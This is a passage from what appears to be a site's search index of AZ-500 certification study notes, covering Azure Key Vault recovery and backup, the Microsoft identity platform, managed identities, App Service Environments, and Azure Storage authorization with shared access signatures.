                            Key vault recovery. - Upon deleting a key vault object, the service will place the object in a deleted state, making it inaccessible to any retrieval operations. During the soft-delete retention interval, the following apply:

                            • You may list all of the key vaults and key vault objects in the soft-delete state for your subscription as well as access deletion and recovery information about them. Only users with special permissions can list deleted vaults. We recommend that our users create a custom role with these special permissions for handling deleted vaults.
                            • A key vault with the same name can't be created in the same location; correspondingly, a key vault object can't be created in a given vault if that key vault contains an object with the same name and which is in a deleted state.
                            • Only a privileged user may restore a key vault or key vault object by issuing a recover command on the corresponding proxy resource. The user, member of the custom role, who has the privilege to create a key vault under the resource group can restore the vault.
                            • Only a privileged user may forcibly delete a key vault or key vault object by issuing a delete command on the corresponding proxy resource.

                            Unless a key vault or key vault object is recovered, at the end of the retention interval the service performs a purge of the soft-deleted key vault or key vault object and its content. Resource deletion may not be rescheduled.

                            Billing. - In general, when an object (a key vault or a key or a secret) is in deleted state, there are only two operations possible: 'purge' and 'recover'. All the other operations fail. Therefore, even though the object exists, no operations can be performed and hence no usage will occur, so no bill. However there are following exceptions:

                            • 'purge' and 'recover' actions count towards normal key vault operations and billed.
                            • If the object is an HSM-key, the 'HSM Protected key' charge per key version per month charge applies if a key version has been used in last 30 days. After that, since the object is in deleted state no operations can be performed against it, so no charge will apply.

                            Soft-deleted protection by default from February 2025. - If a secret is deleted and the key vault doesn't have soft-deleted protection, it's deleted permanently. Although users can currently opt out of soft-delete during key vault creation, this ability is deprecated. In February 2025, Microsoft enables soft-delete protection on all key vaults, and users are no longer be able to opt out of or turn off soft-delete. This, protect secrets from accidental or malicious deletion by a user.

                            Key vault backup. - Back up secrets only if you have a critical business justification. Backing up secrets in your key vault may introduce operational challenges such as maintaining multiple sets of logs, permissions, and backups when secrets expire or rotate. Key Vault maintains availability in disaster scenarios and will automatically fail over requests to a paired region without any intervention from a user. If you want protection against accidental or malicious deletion of your secrets, configure soft-delete and purge protection features on your key vault.

                            Key Vault does not support the ability to backup more than 500 past versions of a key, secret, or certificate object. Attempting to backup a key, secret, or certificate object may result in an error. It is not possible to delete previous versions of a key, secret, or certificate.

                            Key Vault doesn't currently provide a way to back up an entire key vault in a single operation. Any attempt to use the commands listed in this document to do an automated backup of a key vault may result in errors and not supported by Microsoft or the Azure Key Vault team.

                            When you back up a key vault object, such as a secret, key, or certificate, the backup operation downloads the object as an encrypted blob. This blob can't be decrypted outside of Azure.\u00a0To get usable data from this blob, you must restore the blob into a key vault within the same Azure subscription and Azure geography. To back up a key vault object, you must have:

                            • Contributor-level or higher permissions on an Azure subscription.
                            • A primary key vault that contains the secrets you want to back up.
                            • A secondary key vault where secrets are restored.

                            Azure Dedicated HSM is most suitable for \u201clift-and-shift\u201d scenarios that require direct and sole access to HSM devices. Examples include:

                            • Migrating applications from on-premises to Azure Virtual Machines
                            • Migrating applications from Amazon AWS EC2 to virtual machines that use the AWS Cloud HSM Classic service
                            • Running shrink-wrapped software such as Apache/Ngnix SSL Offload, Oracle TDE, and ADCS in Azure Virtual Machines

                            Azure Dedicated HSM is not a good fit for the following type of scenario: Microsoft cloud services that support encryption with customer-managed keys (such as Azure Information Protection, Azure Disk Encryption, Azure Data Lake Store, Azure Storage, Azure SQL Database, and Customer Key for Office 365) that are not integrated with Azure Dedicated HSM.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#2-application-security-features","title":"2. Application Security features","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#21-microsoft-identity-platform","title":"2.1. Microsoft Identity Platform","text":"

                            Some acronyms:

                            • Azure AD Authentication Library (ADAL)
                            • Microsoft Authentication Library (MSAL)
                            • Microsoft Secure Development Lifecycle (SDL)

                            Microsoft identity platform is an evolution of the Azure Active Directory (Azure AD) developer platform. The Microsoft identity platform supports industry-standard protocols such as OAuth 2.0 and OpenID Connect. With this unified Microsoft identity platform (v2.0), you can write code once and authenticate any Microsoft identity into your application.

                            The fully supported open-source Microsoft Authentication Library (MSAL) is recommended for use against the identity platform endpoints. MSAL... - is simple to use - provides great single sign-on (SSO) experiences for your users - helps you achieve high reliability and performance, - and is developed using Microsoft Secure Development Lifecycle (SDL).

                            With the Microsoft identity platform, one can expand their reach to these kinds of users:

                            • Work and school accounts (Microsoft Entra ID provisioned accounts)
                            • Personal accounts (such as Outlook.com or Hotmail.com)
                            • Your customers who bring their own email or social identity (such as LinkedIn, Facebook, and Google) via MSAL and Azure AD Business-to-Consumer (B2C)

                            The Microsoft identity platform has two endpoints (v1.0 and v2.0); however, when developing a new application, consider it's highly recommended that you use the v2.0 (default) endpoint to benefit from the latest features and capabilities:

                            The Microsoft Authentication Library or MSAL can be used in many application scenarios, including the following:

                            • Single-page applications (JavaScript)
                            • Web app signing in users
                            • Web application signing in a user and calling a web API on behalf of the user
                            • Protecting a web API so only authenticated users can access it
                            • Web API calling another downstream Web API on behalf of the signed-in user
                            • Desktop application calling a web API on behalf of the signed-in user
                            • Mobile application calling a web API on behalf of the user who's signed in interactively.
                            • Desktop/service daemon application calling web API on behalf of itself

                            Languages and frameworks

                            Library Supported platforms and frameworks MSAL for Android Android MSAL Angular Single-page apps with Angular and Angular.js frameworks MSAL for iOS and macOS iOS and macOS MSAL Go (Preview) Windows, macOS, Linux MSAL Java Windows, macOS, Linux MSAL.js JavaScript/TypeScript frameworks such as Vue.js, Ember.js, or Durandal.js MSAL.NET .NET Framework, .NET Core, Xamarin Android, Xamarin iOS, Universal Windows Platform MSAL Node Web apps with Express, desktop apps with Electron, Cross-platform console apps MSAL Python Windows, macOS, Linux MSAL React Single-page apps with React and React-based libraries (Next.js, Gatsby.js)

                            Migrate apps that use ADAL to MSAL. - Active Directory Authentication Library (ADAL) integrates with the Azure AD for developers (v1.0) endpoint, where MSAL integrates with the Microsoft identity platform. The v1.0 endpoint supports work accounts but not personal accounts. The v2.0 endpoint is unifying Microsoft personal accounts and works accounts into a single authentication system. Additionally, with MSAL, you can also get authentications for Azure AD B2C.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#the-application-model","title":"The Application Model","text":"

                            For an identity provider to know that a user has access to a particular app, both the user and the application must be registered with the identity provider. When you register your application with\u00a0Microsoft Entra ID, you're providing an identity configuration for your application that allows it to integrate with the Microsoft identity platform. Registering the app also allows you to:

                            • Customize the branding of your application in the sign-in dialog box.
                            • Decide if you want to allow users to sign in only if they belong to your organization. This architecture is known as a single-tenant application. Or, you can allow users to sign in by using any work or school account, which is known as a multi-tenant application.
                            • Request scope permissions. For example, you can request the \"user.read\" scope, which grants permission to read the profile of the signed-in user.
                            • Define scopes that define access to your web\u00a0application programming interface (API).
                            • Share a secret with the Microsoft identity platform that proves the app's identity.

                            After the app is registered, it's given a unique identifier that it shares with the Microsoft identity platform when it requests tokens. If the app is a confidential client application, it will also share the secret or the public key depending on whether certificates or secrets were used. The Microsoft identity platform represents applications by using a model that fulfills two main functions:

                            • Identify the app by the authentication protocols it supports.
                            • Provide all the identifiers,\u00a0Uniform Resource Locators (URLs), secrets, and related information that are needed to authenticate.

                            The Microsoft identity platform:

                            • Holds all the data required to support authentication at runtime.
                            • Holds all the data for deciding what resources an app might need to access, and under what circumstances a given request should be fulfilled.
                            • Provides infrastructure for implementing app provisioning within the app developer's tenant, and to any other Microsoft Entra tenant.
                            • Handles user consent during token request time and facilitates the dynamic provisioning of apps across tenants.

                            Flow in multi-tenant apps

                            In this provisioning flow:

                            1. A user from tenant B attempts to sign in with the app. The authorization endpoint requests a token for the application.
                            2. The user credentials are acquired and verified for authentication.
                            3. The user is prompted to provide consent for the app to gain access to tenant B.
                            4. The Microsoft identity platform uses the application object in tenant A as a blueprint for creating a service principal in tenant B.
                            5. The user receives the requested token.

                            You can repeat this process for more tenants. Tenant A retains the blueprint for the\u00a0app (application object). Users and admins of all the other tenants where the app is given consent keep control over what the application is allowed to do via the corresponding service principal object in each tenant.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#22-register-an-application-with-app-registration","title":"2.2. Register an application with App Registration","text":"

                            Before your app can get a token from the Microsoft identity platform, it must be registered in the Azure portal. Registration integrates your app with the Microsoft identity platform and establishes the information that it uses to get tokens, including:

                            • Application ID: A unique identifier assigned by the Microsoft identity platform.
                            • Redirect URI/URL: One or more endpoints at which your app will receive responses from the Microsoft identity platform. (For native and mobile apps, this is a URI assigned by the Microsoft identity platform.)
                            • Application Secret: A password or a public/private key pair that your app uses to authenticate with the Microsoft identity platform. (Not needed for native or mobile apps.)

                            Like most developers, you will probably use authentication libraries to manage your token interactions with the Microsoft identity platform. Authentication libraries abstract many protocol details, like validation, cookie handling, token caching, and maintaining secure connections, away from the developer and let you focus your development on your app. Microsoft publishes open-source client libraries and server middleware.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#23-configure-microsoft-graph-permissions","title":"2.3. Configure Microsoft Graph permissions","text":"

                            Microsoft Graph exposes granular permissions that control the access that apps have to resources, like users, groups, and mail.

                            Microsoft Graph has two types of permissions:

                            • Delegated permissions\u00a0are used by apps that have a signed-in user present. For these apps, either the user or an administrator consents to the permissions that the app requests, and the app can act as the signed-in user when making calls to Microsoft Graph. Some delegated permissions can be consented by non-administrative users, but some higher-privileged permissions require administrator consent.
                            • Application permissions\u00a0are used by apps that run without a signed-in user present; for example, apps that run as background services or daemons. Application permissions can only be consented by an administrator.

                            Effective permissions are the permissions that your app will have when making requests to Microsoft Graph. It is important to understand the difference between the delegated and application permissions that your app is granted and its effective permissions when making calls to Microsoft Graph.

                            For example, assume your app has been granted the User.ReadWrite.All delegated permission. This permission nominally grants your app permission to read and update the profile of every user in an organization. If the signed-in user is a global administrator, your app will be able to update the profile of every user in the organization. However, if the signed-in user is not in an administrator role, your app will be able to update only the profile of the signed-in user

                            Microsoft Graph API. - \u00a0The Microsoft Graph Security API is an intermediary service (or broker) that provides a single programmatic interface to connect multiple Microsoft Graph Security providers (also called security providers or providers). The Microsoft Graph Security API federates requests to all providers in the Microsoft Graph Security ecosystem.

                            The following is a description of the flow:

                            1. The application user signs in to the provider application to view the consent form from the provider. This consent form experience or UI is owned by the provider and applies to non-Microsoft providers only to get explicit consent from their customers to send requests to Microsoft Graph Security API.
                            2. The client consent is stored on the provider side.
                            3. The provider consent service calls the Microsoft Graph Security API to inform consent approval for the respective customer.
                            4. The application sends a request to the Microsoft Graph Security API.
                            5. The Microsoft Graph Security API checks for the consent information for this customer mapped to various providers.
                            6. The Microsoft Graph Security API calls all those providers the customer has given explicit consent to via the provider consent experience.
                            7. The response is returned from all the consented providers for that client.
                            8. The result set response is returned to the application.
                            9. If the customer has not consented to any provider, no results from those providers are included in the response.

                            Why use the Microsoft Graph Security API?

                            • Write code \u2013 Find code samples in C#, Java, NodeJS, and more.
                            • Connect using scripts \u2013 Find PowerShell samples.
                            • Drag and drop into workflows and playbooks \u2013 Use Microsoft Graph Security connectors for Azure Logic Apps, Microsoft Flow, and PowerApps.
                            • Get data into reports and dashboards \u2013 Use the Microsoft Graph Security connector for Power BI.
                            • Connect using Jupyter notebooks \u2013 Find Jupyter notebook samples.
                            • Unify and standardize alert tracking: Connect once to integrate alerts from any Microsoft Graph-integrated security solution and keep alert status and assignments in sync across all solutions. You can also stream alerts to security information and event management (SIEM) solutions, such as Splunk using Microsoft Graph Security API connectors.
                            • Correlate security alerts to improve threat protection and response: Correlate alerts across security solutions more easily with a unified alert schema.
                            • Update alert tags, status, and assignments: Tag alerts with additional context or threat intelligence to inform response and remediation. Ensure that comments and feedback on alerts are captured for visibility to all workflows. Keep alert status and assignments in sync so that all integrated solutions reflect the current state. Use webhook subscriptions to get notified of changes.
                            • Unlock security context to drive investigation: Dive deep into related security-relevant inventory (like users, hosts, and apps), then add organizational context from other Microsoft Graph providers (Microsoft Entra ID, Microsoft Intune, Microsoft 365) to bring business and security contexts together and improve threat response.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#24-enable-managed-identities","title":"2.4. Enable managed identities","text":"

                            Managed Identities\u00a0for Azure resources is the new name for the service formerly known as Managed Service Identity (MSI) for Azure resources feature in Microsoft Entra provides Azure services with an automatically managed identity in Microsoft Entra ID. You can use the identity to authenticate to any service that supports Microsoft Entra authentication, including Key Vault, without any credentials in your code. The managed identities for Azure resources feature is free with Microsoft Entra ID for Azure subscriptions. There's no additional cost.

                            Terminology. - The following terms are used throughout the managed identities for Azure resources documentation set:

                            • Client ID\u00a0- a unique identifier generated by Microsoft Entra ID that is tied to an application and service principal during its initial provisioning.
                            • Principal ID\u00a0- the object ID of the service principal object for your managed identity that is used to grant role-based access to an Azure resource.
                            • Azure Instance Metadata Service (IMDS)\u00a0- a REST endpoint accessible to all IaaS VMs created via the Azure Resource Manager. The endpoint is available at a well-known non-routable IP address (169.254.169.254) that can be accessed only from within the VM.

                            How managed identities for Azure resources works. - There are two types of managed identities:

                            • A system-assigned managed identity\u00a0is enabled directly on an Azure service instance. When the identity is enabled, Azure creates an identity for the instance in the Microsoft Entra tenant that's trusted by the subscription of the instance. After the identity is created, the credentials are provisioned onto the instance. The lifecycle of a system-assigned identity is directly tied to the Azure service instance that it's enabled on. If the instance is deleted, Azure automatically cleans up the credentials and the identity in Microsoft Entra ID.
                            • A user-assigned managed identity\u00a0is created as a standalone Azure resource. Through a create process, Azure creates an identity in the Microsoft Entra tenant that's trusted by the subscription in use. After the identity is created, the identity can be assigned to one or more Azure service instances. The lifecycle of a user-assigned identity is managed separately from the lifecycle of the Azure service instances to which it's assigned.

                            The following table shows the differences between the two types of managed identities:

                            Property System-assigned managed identity User-assigned managed identity Creation Created as part of an Azure resource (for example, Azure Virtual Machines or Azure App Service). Created as a stand-alone Azure resource. Life cycle Shared life cycle with the Azure resource that the managed identity is created with. When the parent resource is deleted, the managed identity is deleted as well. Independent life cycle. Must be explicitly deleted. Sharing across Azure resources Can\u2019t be shared. It can only be associated with a single Azure resource. Can be shared. The same user-assigned managed identity can be associated with more than one Azure resource. Common use cases Workloads contained within a single Azure resource. Workloads needing independent identities. For example, an application that runs on a single virtual machine. Workloads that run on multiple resources and can share a single identity. Workloads needing pre-authorization to a secure resource, as part of a provisioning flow. Workloads where resources are recycled frequently, but permissions should stay consistent. For example, a workload where multiple virtual machines need to access the same resource.

                            Credential rotation. - Credential rotation is controlled by the resource provider that hosts the Azure resource. The default rotation of the credential occurs every 46 days. It's up to the resource provider to call for new credentials, so the resource provider could wait longer than 46 days. The following diagram shows how managed service identities work with Azure virtual machines (VMs):

                            1. Azure Resource Manager receives a request to enable the system-assigned managed identity on a VM.
                            2. Azure Resource Manager creates a service principal in Microsoft Entra ID for the identity of the VM. The service principal is created in the Microsoft Entra tenant that's trusted by the subscription.
                            3. Azure Resource Manager configures the identity on the VM by updating the Azure Instance Metadata Service identity endpoint with the service principal client ID and certificate.
                            4. After the VM has an identity, use the service principal information to grant the VM access to Azure resources. To call Azure Resource Manager, use role-based access control (RBAC) in Microsoft Entra ID to assign the appropriate role to the VM service principal. To call Key Vault, grant your code access to the specific secret or key in Key Vault.
                            5. Your code that's running on the VM can request a token from the Azure Instance Metadata service endpoint, accessible only from within the VM:\u00a0http://169.254.169.254/metadata/identity/oauth2/token
                              • The resource parameter specifies the service to which the token is sent. To authenticate to Azure Resource Manager, use resource=https://management.azure.com/.
                              • API version parameter specifies the IMDS version, use api-version=2018-02-01 or greater.
                            6. A call is made to Microsoft Entra ID to request an access token (as specified in step 5) by using the client ID and certificate configured in step 3. Microsoft Entra ID returns a JSON Web Token (JWT) access token.
                            7. Your code sends the access token on a call to a service that supports Microsoft Entra authentication
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#25-azure-app-services","title":"2.5. Azure App Services","text":"

                            Azure App Service\u00a0is an HTTP-based service for\u00a0hosting web applications,\u00a0REST APIs, and\u00a0mobile backends. You can develop in your favorite language, be it .NET, .NET Core, Java, Ruby, Node.js, PHP, or Python. Applications run and scale with ease on both Windows and Linux-based environments. Azure App Service is a fully managed platform as a service (PaaS) offering for developers. Here are some key features of App Service:

                            • Multiple languages and frameworks - App Service has first-class support for ASP.NET, ASP.NET Core, Java, Ruby, Node.js, PHP, or Python. You can also run PowerShell and other scripts or executables as background services.
                            • Managed production environment - App Service automatically patches and maintains the OS and language frameworks for you.
                            • Containerization and Docker - Dockerize your app and host a custom Windows or Linux container in App Service. Run multi-container apps with Docker Compose.
                            • DevOps optimization - Set up continuous integration and deployment with Azure DevOps, GitHub, BitBucket, Docker Hub, or Azure Container Registry.
                            • Global scale with high availability - Scale up or out manually or automatically.
                            • Connections to SaaS platforms and on-premises data - Choose from more than 50 connectors for enterprise systems (such as SAP), SaaS services (such as Salesforce), and internet services (such as Facebook). Access on-premises data using Hybrid Connections and Azure Virtual Networks.
                            • Security and compliance - The App Service is ISO, SOC, and PCI compliant. Authenticate users with Microsoft Entra ID, Google, Facebook, Twitter, or Microsoft account. Create IP address restrictions and manage service identities. Prevent subdomain takeovers.
                            • Application templates - Choose from an extensive list of application templates in the Azure Marketplace, such as WordPress, Joomla, and Drupal.
                            • Visual Studio and Visual Studio Code integration - Dedicated tools in Visual Studio and Visual Studio Code streamline the work of creating, deploying, and debugging.
                            • API and mobile features - App Service provides turn-key CORS support for RESTful API scenarios and simplifies mobile app scenarios by enabling authentication, offline data sync, push notifications, and more.
                            • Serverless code - Run a code snippet or script on-demand without having to explicitly provision or manage infrastructure and pay only for the compute time your code actually uses.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#26-app-service-environment","title":"2.6. App Service Environment","text":"

                            An\u00a0App Service Environment\u00a0is an Azure App Service feature that provides a fully isolated and dedicated environment for running App Service apps securely at high scale. An App Service Environment can host:

                            • Windows web apps
                            • Linux web apps
                            • Docker containers (Windows\u00a0and\u00a0Linux)
                            • Functions
                            • Logic apps (Standard)

                            App Service Environments have many use cases, including:

                            • Internal line-of-business applications.
                            • Applications that need more than 30 App Service plan instances.
                            • Single-tenant systems to satisfy internal compliance or security requirements.
                            • Network-isolated application hosting.
                            • Multi-tier applications.

                            There are many networking features that enable apps in a multi-tenant App Service to reach network-isolated resources or become network-isolated themselves. These features are enabled at the application level. With an App Service Environment, no added configuration is required for the apps to be on a virtual network. The apps are deployed into a network-isolated environment that's already on a virtual network. If you really need a complete isolation story, you can also deploy your App Service Environment onto dedicated hardware.

                            Dedicated environment. - An App Service Environment is a single-tenant deployment of Azure App Service that runs on your virtual network:

                            • Applications are hosted in App Service plans (which are a provisioning profile for an application host.)
                            • App Service plans are created in an App Service Environment.

                            Scaling out an App Service plan: you create more application hosts with all the apps in that App Service plan on each host.

                            • A single App Service Environment v3 can have up to 200 total App Service plan instances across all the App Service plans combined.
                            • A single App Service Isolated v2 (Iv2) plan can have up to 100 instances by itself.
                            • When you're deploying onto dedicated hardware (hosts), you're limited in scaling across all App Service plans to the number of cores in this type of environment. An App Service Environment that's deployed on dedicated hosts has 132 vCores available. I1v2 uses two vCores, I2v2 uses four vCores, and I3v2 uses eight vCores per instance.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#27-azure-app-service-plan","title":"2.7. Azure App Service plan","text":"

                            An app service always runs in an\u00a0App Service plan. In addition, Azure Functions also has the option of running in an App Service plan. An App Service plan defines a set of compute resources for a web app to run. These compute resources are analogous to the server farm in conventional web hosting. One or more apps can be configured to run on the same computing resources (or in the same App Service plan).

                            Each App Service plan defines:

                            • Operating System (Windows, Linux)
                            • Region (West US, East US, etc.)
                            • Number of VM instances
                            • Size of VM instances (Small, Medium, Large)
                            • Pricing tier (Free, Shared, Basic, Standard, Premium, PremiumV2, PremiumV3, Isolated, IsolatedV2). This determines what App Service features you get and how much you pay for the plan.

                            When you create an App Service plan in a certain region (for example, West Europe), a set of compute resources is created for that plan in that region. Whatever apps you put into this App Service plan run on these compute resources as defined by your App Service plan.

                            The pricing tiers available to your App Service plan depend on the operating system selected at creation time. There are a few categories of pricing tiers:

                            • Shared compute: Free and Shared, the two base tiers, runs an app on the same Azure VM as other App Service apps, including apps of other customers. These tiers allocate CPU quotas to each app that runs on the shared resources, and the resources cannot scale out.
                            • Dedicated compute: The Basic, Standard, Premium, PremiumV2, and PremiumV3 tiers run apps on dedicated Azure VMs. Only apps in the same App Service plan share the same compute resources. The higher the tier, the more VM instances are available to you for scale-out.
                            • Isolated: This Isolated and IsolatedV2 tiers run dedicated Azure VMs on dedicated Azure Virtual Networks. It provides network isolation on top of compute isolation to your apps. It provides the maximum scale-out capabilities.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#28-app-service-environment-networking","title":"2.8. App Service Environment networking","text":"

                            App Service Environment is a single-tenant deployment of Azure App Service that hosts Windows and Linux containers, web apps, API apps, logic apps, and function apps. When you install an App Service Environment, you pick the Azure virtual network that you want it to be deployed in. All of the inbound and outbound application traffic is inside the virtual network you specify. You deploy into a single subnet in your virtual network, and nothing else can be deployed into that subnet.

                            Subnet requirements. - You must delegate the subnet to Microsoft.Web/hostingEnvironments, and the subnet must be empty. The size of the subnet can affect the scaling limits of the App Service plan instances within the App Service Environment. It's a good idea to use a /24 address space (256 addresses) for your subnet to ensure enough addresses to support production scale.

                            Windows Containers uses an additional IP address per app for each App Service plan instance, and you need to size the subnet accordingly. If your App Service Environment has, for example, 2 Windows Container App Service plans, each with 25 instances and each with 5 apps running, you will need 300 IP addresses and additional addresses to support horizontal (up/down) scale.

                            The minimal size of your subnet is a /27 address space (32 addresses). Any particular subnet has five addresses reserved for management purposes. In addition to the management addresses, App Service Environment dynamically scales the supporting infrastructure and uses between 4 and 27 addresses, depending on the configuration and load. You can use the remaining addresses for instances in the App Service plan.

                            If you run out of addresses within your subnet, you can be restricted from scaling out your App Service plans in the App Service Environment. Another possibility is that you can experience increased latency during intensive traffic load if Microsoft can't scale the supporting infrastructure.

                            App Service Environment has the following network information at creation:

                            Address type Description App Service Environment virtual network The virtual network deployed into. App Service Environment subnet The subnet deployed into. Domain suffix The domain suffix that is used by the apps made. Virtual IP (VIP) The VIP type is used. The two possible values are internal and external. Inbound address The inbound address is the address at which your apps are reached. If you have an internal VIP, it's an address in your App Service Environment subnet. If the address is external, it's a public-facing address. Default outbound addresses The apps use this address, by default, when making outbound calls to the internet.

                            As you scale your App Service plans in your App Service Environment, you'll use more addresses from your subnet. Apps in the App Service Environment don't have dedicated addresses in the subnet. The specific addresses an app uses in the subnet will change over time.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#29-availability-zone-support-for-app-service-environments","title":"2.9. Availability Zone Support for App Service Environments","text":"

                            Azure App Service Environment can be deployed across\u00a0availability zones (AZ)\u00a0to help you achieve resiliency and reliability for your business-critical workloads. This architecture is also known as zone redundancy.

                            When you configure it to be zone redundant, the platform automatically spreads the instances of the Azure App Service plan across three zones in the selected region. This means that the minimum App Service Plan instance count will always be three. If you specify a capacity larger than three, and the number of instances is divisible by three, the instances are spread evenly. Otherwise,\u00a0instance counts beyond 3*N\u00a0are spread across the remaining one or two zones.

                            • You configure availability zones when you create your App Service Environment.
                            • You can only specify availability zones when creating a new App Service Environment, not later.
                            • Availability zones are\u00a0only supported in a subset of regions.

                            Since you can't convert pre-existing App Service Environments to use availability zones, migration will consist of a side-by-side deployment where you'll create a new App Service Environment with availability zones enabled. For more information on App Service Environment migration options, see App Service Environment migration.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#210-app-service-environment-certificates","title":"2.10. App Service Environment Certificates","text":"

                            Azure App Service\u00a0provides a highly scalable, self-patching web hosting service. Once the certificate is added to your App Service app or function app, you can secure a\u00a0custom Domain Name System (DNS)\u00a0name with it or use it in your application code.

                            A certificate uploaded into an app is stored in a deployment unit that is bound to the app service plan's resource group and region combination (internally called a webspace). This makes the certificate accessible to other apps in the same resource group and region combination.

                            The following lists are options for adding certificates in App Service:

                            • Create a free App Service managed certificate: A private certificate that's free of charge and easy to use if you just need to secure your custom domain in App Service.
                            • Purchase an App Service certificate: A private certificate that's managed by Azure. It combines the simplicity of automated certificate management and the flexibility of renewal and export options.
                            • Import a certificate from Key Vault: Useful if you use Azure Key Vault to manage your\u00a0Public-Key Cryptography Standards #12 (PKCS12)\u00a0certificates.
                            • Upload a private certificate: If you already have a private certificate from a third-party provider, you can upload it.
                            • Upload a public certificate: Public certificates are not used to secure custom domains, but you can load them into your code if you need them to access remote resources.

                            **Prerequisites: **

                            • Create an App Service app.
                            • For a private certificate, make sure that it satisfies all requirements from App Service.
                            • Free certificate only:
                              • Map the domain you want a certificate for to App Service.
                              • For a root domain (like contoso.com), make sure your app doesn't have any IP restrictions configured. Both certificate creation and its periodic renewal for a root domain depends on your app being reachable from the internet.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#3-storage-security","title":"3. Storage Security","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#31-data-sovereignty","title":"3.1. Data sovereignty","text":"

                            Data sovereignty is the concept that information, which has been converted and stored in binary digital form, is subject to the laws of the country or region in which it is located. We recommend that you configure business continuity and disaster recovery (BCDR) across regional pairs to benefit from Azure\u2019s isolation and VM policies.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#32-configure-azure-storage-access","title":"3.2. Configure Azure storage access","text":"

                            Options for authorizing requests to Azure Storage include:

                            • Microsoft Entra ID\u00a0- Azure Storage provides integration with Microsoft Entra ID for identity-based authorization of requests to the Blob and Queue services. When you use Microsoft Entra ID to authorize requests make from your applications, you avoid having to store your account access key with your code, as you do with Shared Key authorization. While you can continue to use Shared Key authorization with your blob and queue applications, Microsoft recommends moving to Microsoft Entra ID where possible.
                            • Microsoft Entra Domain Services authorization\u00a0for Azure Files. Azure Files supports identity-based authorization over Server Message Block (SMB) through Microsoft Entra Domain Services. You can use RBAC for fine-grained control over a client's access to Azure Files resources in a storage account
                            • Shared Key\u00a0- Shared Key authorization relies on your account access keys and other parameters to produce an encrypted signature string that is passed on via the request in the Authorization header.
                            • Shared Access Signatures\u00a0- A shared access signature (SAS) is a URI that grants restricted access rights to Azure Storage resources. You can provide a shared access signature to clients who should not be trusted with your storage account key but to whom you wish to delegate access to certain storage account resources. By distributing a shared access signature URI to these clients, you can grant them access to a resource for a specified period of time, with a specified set of permissions. The URI query parameters comprising the SAS token incorporate all of the information necessary to grant controlled access to a storage resource. A client who is in possession of the SAS can make a request against Azure Storage with just the SAS URI, and the information contained in the SAS token is used to authorize the request.
                            • Anonymous access to containers and blobs\u00a0- You can enable anonymous, public read access to a container and its blobs in Azure Blob storage. By doing so, you can grant read-only access to these resources without sharing your account key, and without requiring a shared access signature (SAS).
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#33-deploy-shared-access-signatures","title":"3.3. Deploy shared access signatures","text":"

                            As a best practice, you shouldn't share storage account keys with external third-party applications. For untrusted clients, use a\u00a0shared access signature\u00a0(SAS).

                            A shared access signature is a string that contains a security token that can be attached to a URI. Use a shared access signature to delegate access to storage objects and specify constraints, such as the permissions and the time range of access.

                            -\u00a0Service-level\u00a0shared access signature allows access to specific resources in a storage account. You'd use this type of shared access signature, for example, to allow an app to retrieve a list of files in a file system or to download a file. It is used to delegate access to a resource in either Blob storage, Queue storage, Table storage, or Azure Files. - Account-level\u00a0shared access signature allows access to anything that a service-level shared access signature can allow, plus additional resources and abilities. For example, you can use an account-level shared access signature to allow the ability to create file systems. - User delegation SAS, introduced with version 2018-11-09, is secured with Microsoft Entra credentials. This type of SAS is supported for the Blob service only and can be used to grant access to containers and blobs.

                            One would typically use a shared access signature for a service where users read and write their data to your storage account. Accounts that store user data have two typical designs:

                            • Clients upload and download data through a front-end proxy service, which performs authentication. This front-end proxy service has the advantage of allowing validation of business rules. But if the service must handle large amounts of data or high-volume transactions, you might find it complicated or expensive to scale this service to match demand.

                            • A lightweight service authenticates the client as needed. Then it generates a shared access signature. After receiving the shared access signature, the client can access storage account resources directly. The shared access signature defines the client's permissions and access interval. The shared access signature reduces the need to route all data through the front-end proxy service.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#34-manage-microsoft-entra-storage-authentication","title":"3.4. Manage Microsoft Entra storage authentication","text":"

                            Azure Storage provides integration with Microsoft Entra ID for identity-based authorization of requests to the Blob and Queue services. With Microsoft Entra ID, you can use Azure role-based access control (Azure RBAC) to grant permissions to a security principal, which may be a user, group, or application service principal. The security principal is authenticated by Microsoft Entra ID to return an OAuth 2.0 token. The token can then be used to authorize a request against the Blob service.

                            Authorization with Microsoft Entra ID is available for all general-purpose and Blob storage accounts in all public regions and national clouds. Only storage accounts created with the Azure Resource Manager deployment model support Microsoft Entra authorization. Blob storage additionally supports creating shared access signatures (SAS) that is signed with Microsoft Entra credentials.

                            When a security principal (a user, group, or application) attempts to access a queue resource, the request must be authorized. With Microsoft Entra ID, access to a resource is a two-step process. First, the security principal's identity is authenticated, and an OAuth 2.0 token is returned. Next, the token is passed as part of a request to the Queue service and used by the service to authorize access to the specified resource. The authentication step requires that an application request an OAuth 2.0 access token at runtime. If an application is running from within an Azure entity, such as an Azure VM, a Virtual Machine Scale Set, or an Azure Functions app, it can use a managed identity to access queues.

